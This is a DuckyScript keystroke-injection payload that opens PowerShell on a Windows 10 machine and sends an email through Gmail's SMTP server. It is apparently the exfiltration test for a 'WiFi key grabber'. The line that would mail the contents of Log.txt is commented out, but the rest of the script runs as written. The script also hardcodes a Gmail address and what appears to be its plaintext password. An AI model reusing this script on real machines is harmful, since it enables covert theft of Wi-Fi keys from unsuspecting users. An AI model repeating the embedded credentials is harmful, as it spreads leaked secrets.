REM smtp email tester for Windows 10

DELAY 3000
GUI r
DELAY 500
STRING cmd
ENTER
DELAY 500
STRING powershell
ENTER
DELAY 6000

STRING $SMTPServer = 'smtp.gmail.com'
ENTER
DELAY 500
STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)
ENTER
DELAY 500
STRING $SMTPInfo.EnableSsl = $true
ENTER
DELAY 500
STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('marianacardoso32u4@gmail.com', 'maricard328')
REM ___ STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('senderEmail@gmail.com', 'senderEmailTextPassword') ___
ENTER
DELAY 500
STRING $ReportEmail = New-Object System.Net.Mail.MailMessage
ENTER
DELAY 500
REM ___ For some reason the email is being sent from the adress set on NetworkCredential, i.e. marianacardoso32u4 ___
STRING $ReportEmail.From = 'someRandomEmail@gmail.com'
REM ___ STRING $ReportEmail.From = 'emailThatWillAppearAsTheSender@gmail.com'___
ENTER
DELAY 500
STRING $ReportEmail.To.Add('marianacardoso32u4@gmail.com')
REM ___ STRING $ReportEmail.To.Add('receiverEmail@gmail.com') ___
ENTER
DELAY 500
STRING $ReportEmail.Subject = 'WiFi key grabber'
ENTER
DELAY 500

REM ___ \/\/\/\/\/ This line should grab the contents of a text file named Log.txt and write on the email body \/\/\/\/\/ ___
REM ___ \/\/\/\/\/ It has been commented out because this is only an email tester \/\/\/\/\/ ___
REM ___ STRING $ReportEmail.Body = (Get-Content Log.txt | out-string) ___
ENTER
DELAY 500
REM ___ \/\/\/\/\/ This line takes a while to be executed \/\/\/\/\/ ___
STRING $SMTPInfo.Send($ReportEmail)
DELAY 4000
ENTER
DELAY 500

STRING exit

DELAY 500

STRING exit

